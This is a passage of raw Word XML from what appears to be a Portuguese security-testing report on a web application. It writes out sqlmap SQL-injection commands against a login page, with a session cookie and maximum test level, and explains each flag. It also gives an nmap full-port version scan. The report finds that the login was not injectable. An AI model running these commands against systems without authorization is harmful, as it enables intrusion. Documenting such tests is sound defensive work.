            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="009C5396" w:rsidRPr="00B01036">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>nome_do_sistema</w:t>
        </w:r>
        <w:r w:rsidRPr="00B01036">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f"  -b  --current -db </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“./sqlmap.py” comando utilizado para executar a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560"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“-u” utilizado </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--cookie” utilizado para especificar um cookie de sessão válido a ser passado para o Sqlmap durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--current -db” utilizado para obter o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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20770" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00D2077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20770" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00D2077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tela de Login não seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D20770" w:rsidRPr="00D20770" w:rsidRDefault="00D20770" w:rsidP="00D20770">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D20770" w:rsidRDefault="005967D5" w:rsidP="00D2077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:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00D2077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20770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00F52870" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. A figura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12</w:t>
      </w:r>
      <w:r w:rsidR="00F52870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20770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mostra </w:t>
      </w:r>
      <w:r w:rsidR="00BF1C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">que </w:t>
      </w:r>
      <w:r w:rsidR="00D20770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00BF1C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pós a</w:t>
      </w:r>
      <w:r w:rsidR="00D20770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> execução e as inúmeras sessões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1A5B8E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s de injeção</w:t>
      </w:r>
      <w:r w:rsidR="00BF1C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o parâmetro informado no comando utilizado não é injetável.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRPr="00F15F82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BF1C7D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2776855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3905250" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="8" name="Arredondar Retângulo em um Canto Úni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42875"/>
                        </a:xfrm>
                        <a:prstGeom prst="round1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0D690" id="Arredondar Retângulo em um Canto Único 8" o:spid="_x0000_s1026" style="position:absolute;margin-left:35.7pt;margin-top:218.65pt;width:307.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" path="m,l3881437,v13152,,23813,10661,23813,23813l3905250,142875,,142875,,xe" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;3881437,0;3905250,23813;3905250,142875;0,142875;0,0" o:connectangles="0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EC5D2B"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2116BEA" wp14:editId="3165C341">
            <wp:extent cx="5476240" cy="40767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F52870" w:rsidP="00D20770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12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Resultado aplicação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SQL Injection via Sqlmap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D20770" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00D20770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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00D20770">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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Repetir a ação da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1 e aumentar o nível de heurística aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5.</w:t>
      </w:r>
      <w:r w:rsidR="00870818" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com o incremento no valor de heurística, aumentaram também a profundidade da árvore de decisão usada nos ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00B17B93">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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Comando utilizado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B01036" w:rsidRDefault="008C6DC7" w:rsidP="00B17B93">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416" w:firstLine="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00B17B93">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="002D4365" w:rsidRPr="00B17B93">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>nomeSistema</w:t>
        </w:r>
        <w:r w:rsidRPr="00B17B93">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" –b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B93">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416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>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B17B93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ab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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“./sqlmap.py”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executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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“-u”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especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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“--cookie”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especificar um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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“--current -db”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obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B17B9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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> “--level 5” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para aumentar o nível da heurística utilizada no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRPr="00F15F82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52870" w:rsidRPr="00F15F82" w:rsidRDefault="00F52870" w:rsidP="0040058D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F52870" w:rsidP="0040058D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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se que a tela de Login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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040058D" w:rsidRDefault="005967D5" w:rsidP="0040058D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="0040058D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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Embora tendo aumentado o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e</w:t>
      </w:r>
      <w:r w:rsidR="0040058D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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por consequência</w:t>
      </w:r>
      <w:r w:rsidR="0040058D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> disso,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não foi possível descobrir o nome do banco de dados utilizado pelo sistema.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7137" w:rsidRDefault="008C6DC7" w:rsidP="00D57137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7137">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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D57137" w:rsidP="00D5713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4.3.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00503644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Atividade</w:t>
      </w:r>
      <w:r w:rsidR="00F52870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 w:rsidR="00503644" w:rsidRPr="00F15F82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nálise do Servidor via Nmap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Após o problema de corrupção do sistema operacional do servidor de dados da aplicação</w:t>
      </w:r>
      <w:r w:rsidR="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, relatado na</w:t>
      </w:r>
      <w:r w:rsidR="004850DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> seção ATA 05 d</w:t>
      </w:r>
      <w:r w:rsidR="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o subcapítulo 4.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, houve mudanças na arquitetura do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de dados.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9317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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00B15531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Usar o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan TCP.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9B1DC9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Comando utilizado: nmap -sV -p 1-65535 IP_do_servidor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52360" w:rsidRDefault="00C52360" w:rsidP="009B1DC9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“nmap” é utilizado para executar a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9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“-sV” é utilizado para realizar o SYN e buscar a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311F69" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9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“-p” indica quais </w:t>
      </w:r>
      <w:r w:rsidR="00311F69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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>porta</w:t>
      </w:r>
      <w:r w:rsidR="00C52360">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s serão usadas na varredura</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, o delimitador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9">
      <w:p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é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009B1DC9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IP_do_servidor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:rsidR="009B1DC9" w:rsidRDefault="009B1DC9" w:rsidP="00B15531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B15531" w:rsidRDefault="00B15531" w:rsidP="00B15531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:rsidR="00B15531" w:rsidRPr="00B15531" w:rsidRDefault="00B15531" w:rsidP="00B15531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Espera</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-se</w:t>
      </w:r>
      <w:r w:rsidR="00BA5C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> descobrir as portas abertas</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, os serviços</w:t>
      </w:r>
      <w:r w:rsidR="00BA5C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e a versão </w:t>
      </w:r>
      <w:r w:rsidR="00A13973">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dos serviços</w:t>
      </w:r>
      <w:r w:rsidR="00BA5C0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que essas portas roda</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52360" w:rsidRPr="00311F69" w:rsidRDefault="00C52360" w:rsidP="00311F6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52360" w:rsidRDefault="00C52360" w:rsidP="00C5236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B15531" w:rsidRPr="00676E62" w:rsidRDefault="00C52360" w:rsidP="00676E62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676E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">De acordo com a figura </w:t>
      </w:r>
      <w:r w:rsidR="00311F69" w:rsidRPr="00676E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00676E62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, foi possível descobrir as portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRPr="00F15F82" w:rsidRDefault="0074275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F15F82" w:rsidRDefault="00EC5D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766745B0" wp14:editId="72E959C2">
            <wp:extent cx="5400040" cy="4114165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311F69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13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Portas TCP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="006C21E3" w:rsidP="006C21E3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Serviços e</w:t>
      </w:r>
      <w:r w:rsidR="005F470B" w:rsidRPr="00F15F82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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="005F470B" w:rsidRPr="00F15F82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F470B" w:rsidRPr="00F15F82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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
